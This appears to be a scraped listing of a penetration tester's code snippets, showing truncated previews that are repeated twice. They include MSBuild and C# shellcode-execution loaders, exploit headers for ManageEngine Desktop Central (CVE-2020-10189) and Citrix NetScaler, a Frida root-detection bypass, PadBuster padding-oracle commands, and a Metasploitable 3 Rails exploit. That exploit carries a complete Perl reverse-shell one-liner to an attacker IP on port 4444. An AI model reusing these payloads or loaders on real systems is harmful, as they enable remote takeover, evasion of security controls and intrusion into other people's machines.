LongCat pich4ya

## fix_virtualenv
#!/usr/bin/env bash

ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"

BAD_ENV_PATHS="/usr/local"

echo "Ensure the root of the broken virtualenv:"
echo "    $ENV_PATH"

## magisk_pixel3a.txt
@author LongCat (Pichaya Morimoto)

1. Enable ADB
Settings > About Phone > Tap on the "Build Number" entry 7 times
Settings > System > Advanced > Developer options > Enable "USB debugging"
Settings > System > Advanced > Developer options > Enable "OEM unlocking"

Note: If you cannot enable "OEM unlocking", then you are out of luck - Buy the new one :)

Connect Pixel 3a to MBP > allow access in the device's prompt.

## shellcode.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
         <!-- This inline task executes shellcode. -->
         <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
         <!-- Save This File And Execute The Above Command -->
         <!-- Author: Casey Smith, Twitter: @subTee -->
         <!-- License: BSD 3-Clause -->
	  <Target Name="Hello">
	    <ClassExample />
	  </Target>
	  <UsingTask

## Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

## src-2020-0011.py
#!/usr/local/bin/python3
"""
ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability

Download: https://www.manageengine.com/products/desktop-central/download-free.html
File ...: ManageEngine_DesktopCentral_64bit.exe
SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
Found by: mr_me
Date ...: 2019-12-12
CVE ....: CVE-2020-10189

## readme_render_exploit.py
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for Metasploitable 3 - render params[:os] 's RCE
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
# This exploit slightly adjusts the temporary file extension to an empty string
import requests

# 1. tmp upload

host = "172.28.128.3"
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"

## netscaler_exploit.py
import requests
import sys
import time

append_value = str(time.time())

print "# By 0x09AL - MDSec ActiveBreach \n"

def upload_file(url,payload):
	endpoint = url + "/vpns/portal/scripts/newbm.pl"

## secureRootCert1.java
/*
ต้อง
- แน่ใจว่ามีไฟล์ root certificate แล้ว
- ตั้ง $JAVA_HOME ให้ถูกที่ และแน่ใจว่ามีโฟล์ $JAVA_HOME/jre/lib/security/cacerts
- รหัสผ่านของ Java keystore เป็นคำว่า changeit โดยค่า default

วิธีการ
1. ต้องไปดาวน์โหลดหรือขอ root certificate ที่จะใช้มาก่อน
Root certificates contain public information and CAs always make them available for anyone.
$ wget https://sth.sh/demo/STH_Root_CA.pem -O ca.pem

## root_bypass.js
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
//  - I added extra whitelisted items to deal with the latest versions
// 						of RootBeer/Cordova iRoot as of August 6, 2019
//  - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {

    var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",

## padbuster_macos2019.txt
brew install openssl
brew install perl
brew unlink perl && brew link perl
env LDFLAGS="-L$(brew --prefix openssl)/lib" CFLAGS="-I$(brew --prefix openssl)/include" perl -MCPAN -e 'install Crypt::SSLeay'

git clone https://github.com/GDSSecurity/PadBuster && cd PadBuster

perl padbuster.pl "https://example.local/ScriptResource.axd?d=yyy" yyy 16 -encoding 3 -bruteforce -log -verbose -cookies "ASP.NET_SessionId=xxx"
	#!/usr/bin/env bash

	ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
	SYSTEM_VIRTUALENV="$(which -a virtualenv\|tail -1)"

	BAD_ENV_PATHS="/usr/local"

	echo "Ensure the root of the broken virtualenv:"
	echo " $ENV_PATH"
	@author LongCat (Pichaya Morimoto)

	1. Enable ADB
	Settings > About Phone > Tap on the "Build Number" entry 7 times
	Settings > System > Advanced > Developer options > Enable "USB debugging"
	Settings > System > Advanced > Developer options > Enable "OEM unlocking"

	Note: If you cannot enable "OEM unlocking", then you are out of luck - Buy the new one :)

	Connect Pixel 3a to MBP > allow access in the device's prompt.
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes shellcode. -->
	<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
	<!-- Save This File And Execute The Above Command -->
	<!-- Author: Casey Smith, Twitter: @subTee -->
	<!-- License: BSD 3-Clause -->
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask
	using System;
	using System.Net;
	using System.Diagnostics;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

	/*
	Author: Casey Smith, Twitter: @subTee
	License: BSD 3-Clause
	#!/usr/local/bin/python3
	"""
	ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability

	Download: https://www.manageengine.com/products/desktop-central/download-free.html
	File ...: ManageEngine_DesktopCentral_64bit.exe
	SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
	Found by: mr_me
	Date ...: 2019-12-12
	CVE ....: CVE-2020-10189
	# @author Pichaya Morimoto (p.morimoto@sth.sh)
	# Exploit for Metasploitable 3 - render params[:os] 's RCE
	# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
	# This exploit slightly adjusts the temporary file extension to an empty string
	import requests

	# 1. tmp upload

	host = "172.28.128.3"
	cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
	import requests
	import sys
	import time

	append_value = str(time.time())

	print "# By 0x09AL - MDSec ActiveBreach \n"

	def upload_file(url,payload):
	endpoint = url + "/vpns/portal/scripts/newbm.pl"
	/*
	ต้อง
	- แน่ใจว่ามีไฟล์ root certificate แล้ว
	- ตั้ง $JAVA_HOME ให้ถูกที่ และแน่ใจว่ามีโฟล์ $JAVA_HOME/jre/lib/security/cacerts
	- รหัสผ่านของ Java keystore เป็นคำว่า changeit โดยค่า default

	วิธีการ
	1. ต้องไปดาวน์โหลดหรือขอ root certificate ที่จะใช้มาก่อน
	Root certificates contain public information and CAs always make them available for anyone.
	$ wget https://sth.sh/demo/STH_Root_CA.pem -O ca.pem
	// $ frida -l antiroot.js -U -f com.example.app --no-pause
	// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
	// - I added extra whitelisted items to deal with the latest versions
	// of RootBeer/Cordova iRoot as of August 6, 2019
	// - The original one just fucked up (kill itself) if Magisk is installed lol
	// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
	// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
	Java.perform(function() {

	var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
	brew install openssl
	brew install perl
	brew unlink perl && brew link perl
	env LDFLAGS="-L$(brew --prefix openssl)/lib" CFLAGS="-I$(brew --prefix openssl)/include" perl -MCPAN -e 'install Crypt::SSLeay'

	git clone https://github.com/GDSSecurity/PadBuster && cd PadBuster

	perl padbuster.pl "https://example.local/ScriptResource.axd?d=yyy" yyy 16 -encoding 3 -bruteforce -log -verbose -cookies "ASP.NET_SessionId=xxx"